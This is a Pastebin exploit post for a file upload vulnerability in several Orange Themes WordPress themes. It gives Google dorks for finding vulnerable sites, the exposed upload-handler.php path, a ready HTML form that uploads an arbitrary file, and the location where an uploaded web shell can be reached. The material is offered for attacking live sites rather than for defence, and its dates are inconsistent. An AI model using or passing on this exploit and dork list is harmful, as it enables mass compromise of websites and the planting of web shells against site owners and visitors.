Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- **Title : Wordpress Orange Themes CSRF File Upload Vulnerability
- **Author : Jje Incovers
- **Date : 01/12/2013 - 17 November 2013
- **Category : Web Applications
- **Type : PHP
- **Vendor : http://www.orange-themes.com/
- **Download : http://www.orange-themes.com/portfolio/
- **Tested : Mozila, Chrome, Opera -> Windows & Linux
- **Vulnerabillity : CSRF
- **Dork :
- inurl:"/wp-content/themes/agritourismo-theme/"
- inurl:"/wp-content/themes/bordeaux-theme/"
- inurl:"/wp-content/themes/bulteno-theme/"
- inurl:"/wp-content/themes/oxygen-theme/"
- inurl:"/wp-content/themes/radial-theme/"
- inurl:"/wp-content/themes/rayoflight-theme/"
- inurl:"/wp-content/themes/reganto-theme/"
- inurl:"/wp-content/themes/rockstar-theme/"
- CSRF File Upload Vulnerability
- Exploit & POC :
- http://site-target/wp-content/themes/rockstar-theme/functions/upload-handler.php
- Script :
- <form enctype="multipart/form-data"
- action="http://127.0.0.1/wp-content/themes/rockstar-theme/functions/upload-handler.php" method="post">
- Your File: <input name="uploadfile" type="file" /><br />
- <input type="submit" value="upload" />
- </form>
- File Access :
- http://site-target/wp-content/uploads/[years]/[month]/your_shell.php
- Example : http://127.0.0.1/wp-content/uploads/2013/13/inc0vers.php
- Note :
- Script CSRF equate with dork you use
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement